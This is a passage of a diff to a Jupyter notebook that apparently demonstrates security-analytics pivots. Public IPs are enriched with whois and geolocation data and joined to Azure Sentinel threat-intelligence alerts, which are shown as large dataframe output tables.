+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 14:57:45+00:00</td>\n",
+       "      <td>2020-11-20 14:57:45+00:00</td>\n",
+       "      <td>2020-11-20 15:08:57+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>b241e024-ca33-c706-7475-c7dbecbc41c3</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 14:57:46+00:00</td>\n",
+       "      <td>2020-11-20 14:57:46+00:00</td>\n",
+       "      <td>2020-11-20 15:08:57+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>f9bf5915-4560-664c-486d-4e60c8cf6641</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 14:57:45+00:00</td>\n",
+       "      <td>2020-11-20 14:57:45+00:00</td>\n",
+       "      <td>2020-11-20 15:08:57+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>63fb83f4-54a0-ad9a-84cc-4d4403dcf8ec</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 14:57:45+00:00</td>\n",
+       "      <td>2020-11-20 14:57:45+00:00</td>\n",
+       "      <td>2020-11-20 15:08:56+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>dd08cd9d-2d76-83b6-daae-335dfd1466eb</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 64 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "            IP           ip  result   nir asn_registry    asn     asn_cidr  \\\n",
+       "0  3.88.48.125  3.88.48.125  Public  None         arin  14618  3.80.0.0/12   \n",
+       "1  3.88.48.125  3.88.48.125  Public  None         arin  14618  3.80.0.0/12   \n",
+       "2  3.88.48.125  3.88.48.125  Public  None         arin  14618  3.80.0.0/12   \n",
+       "3  3.88.48.125  3.88.48.125  Public  None         arin  14618  3.80.0.0/12   \n",
+       "4  3.88.48.125  3.88.48.125  Public  None         arin  14618  3.80.0.0/12   \n",
+       "\n",
+       "  asn_country_code    asn_date asn_description        query  \\\n",
+       "0               US  2017-12-20  AMAZON-AES, US  3.88.48.125   \n",
+       "1               US  2017-12-20  AMAZON-AES, US  3.88.48.125   \n",
+       "2               US  2017-12-20  AMAZON-AES, US  3.88.48.125   \n",
+       "3               US  2017-12-20  AMAZON-AES, US  3.88.48.125   \n",
+       "4               US  2017-12-20  AMAZON-AES, US  3.88.48.125   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "1  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "2  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "3  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "4  [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "\n",
+       "    raw referral raw_referral CountryCode    CountryName     State     City  \\\n",
+       "0  None     None         None          US  United States  Virginia  Ashburn   \n",
+       "1  None     None         None          US  United States  Virginia  Ashburn   \n",
+       "2  None     None         None          US  United States  Virginia  Ashburn   \n",
+       "3  None     None         None          US  United States  Virginia  Ashburn   \n",
+       "4  None     None         None          US  United States  Virginia  Ashburn   \n",
+       "\n",
+       "   Longitude  Latitude   Asn edges       Type_x AdditionalData  ...  \\\n",
+       "0   -77.4728   39.0481  None    {}  geolocation             {}  ...   \n",
+       "1   -77.4728   39.0481  None    {}  geolocation             {}  ...   \n",
+       "2   -77.4728   39.0481  None    {}  geolocation             {}  ...   \n",
+       "3   -77.4728   39.0481  None    {}  geolocation             {}  ...   \n",
+       "4   -77.4728   39.0481  None    {}  geolocation             {}  ...   \n",
+       "\n",
+       "  ConfidenceLevel ConfidenceScore IsIncident              StartTimeUtc  \\\n",
+       "0              83             NaN      False 2020-11-20 14:57:45+00:00   \n",
+       "1              83             NaN      False 2020-11-20 14:57:45+00:00   \n",
+       "2              83             NaN      False 2020-11-20 14:57:46+00:00   \n",
+       "3              83             NaN      False 2020-11-20 14:57:45+00:00   \n",
+       "4              83             NaN      False 2020-11-20 14:57:45+00:00   \n",
+       "\n",
+       "                 EndTimeUtc         ProcessingEndTime RemediationSteps  \\\n",
+       "0 2020-11-20 14:57:45+00:00 2020-11-20 15:08:56+00:00                    \n",
+       "1 2020-11-20 14:57:45+00:00 2020-11-20 15:08:57+00:00                    \n",
+       "2 2020-11-20 14:57:46+00:00 2020-11-20 15:08:57+00:00                    \n",
+       "3 2020-11-20 14:57:45+00:00 2020-11-20 15:08:57+00:00                    \n",
+       "4 2020-11-20 14:57:45+00:00 2020-11-20 15:08:56+00:00                    \n",
+       "\n",
+       "                                                                                    ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "1  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "2  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "3  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "4  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "\n",
+       "                                                                                              Entities  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "\n",
+       "  SourceSystem               WorkspaceSubscriptionId WorkspaceResourceGroup  \\\n",
+       "0    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "1    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "2    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "3    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "4    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f                    soc   \n",
+       "\n",
+       "  ExtendedLinks     ProductName                     ProductComponentName  \\\n",
+       "0                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "1                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "2                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "3                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "4                Azure Sentinel  Microsoft Threat Intelligence Analytics   \n",
+       "\n",
+       "   AlertLink  Status CompromisedEntity  Tactics         Type_y  \\\n",
+       "0                New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "1                New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "2                New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "3                New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "4                New       3.88.48.125  Unknown  SecurityAlert   \n",
+       "\n",
+       "                         SystemAlertId1  \\\n",
+       "0  a9954983-cc15-8b65-8e2d-ae268e8c6cb5   \n",
+       "1  b241e024-ca33-c706-7475-c7dbecbc41c3   \n",
+       "2  f9bf5915-4560-664c-486d-4e60c8cf6641   \n",
+       "3  63fb83f4-54a0-ad9a-84cc-4d4403dcf8ec   \n",
+       "4  dd08cd9d-2d76-83b6-daae-335dfd1466eb   \n",
+       "\n",
+       "                                                                                   ExtendedProperties1  \\\n",
+       "0  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "1  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "2  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "3  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "4  {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...   \n",
+       "\n",
+       "                                                                                             Entities1  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...   \n",
+       "\n",
+       "     MatchingIps src_row_index  \n",
+       "0  [3.88.48.125]             0  \n",
+       "1  [3.88.48.125]             0  \n",
+       "2  [3.88.48.125]             0  \n",
+       "3  [3.88.48.125]             0  \n",
+       "4  [3.88.48.125]             0  \n",
+       "\n",
+       "[5 rows x 64 columns]"
+      ]
+     },
+     "execution_count": 59,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "(\n",
+    "    ips_df\n",
+    "    .mp_pivot.run(entities.IpAddress.util.ip_type, column=\"IP\", join=\"inner\")\n",
+    "    .query(\"result == 'Public'\").head(10)\n",
+    "    .mp_pivot.run(entities.IpAddress.util.whois, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.run(entities.IpAddress.util.geoloc, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.display(title=\"Geo Lookup\", cols=[\"IP\", \"City\"])  # << display an intermediate result\n",
+    "    .mp_pivot.run(entities.IpAddress.AzureSentinel.SecurityAlert_list_alerts_for_ip, source_ip_list=\"ip\", join=\"left\")\n",
+    ").head(5)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 60,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "ip_test_df = (\n",
+    "    ips_df\n",
+    "    .mp_pivot.run(entities.IpAddress.util.ip_type, column=\"IP\", join=\"inner\")\n",
+    "    .query(\"result == 'Public'\").head(10)\n",
+    "    .mp_pivot.run(entities.IpAddress.util.whois, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.run(entities.IpAddress.util.geoloc, column=\"ip\", join=\"left\")\n",
+    ").head(5)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 61,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "      <th>nir</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>query</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>referral</th>\n",
+       "      <th>raw_referral</th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type_x</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>...</th>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <th>IsIncident</th>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <th>ProcessingEndTime</th>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>AlertLink</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <th>Tactics</th>\n",
+       "      <th>Type_y</th>\n",
+       "      <th>SystemAlertId1</th>\n",
+       "      <th>ExtendedProperties1</th>\n",
+       "      <th>Entities1</th>\n",
+       "      <th>MatchingIps</th>\n",
+       "      <th>src_row_index</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 03:52:17+00:00</td>\n",
+       "      <td>2020-11-20 03:52:17+00:00</td>\n",
+       "      <td>2020-11-20 04:06:42+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>45614988-e680-cbc0-4673-babf03147290</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 03:52:17+00:00</td>\n",
+       "      <td>2020-11-20 03:52:17+00:00</td>\n",
+       "      <td>2020-11-20 04:06:42+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>2cc59e4f-1cd3-b583-fdc2-96f1837bb0e1</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...</td>\n",
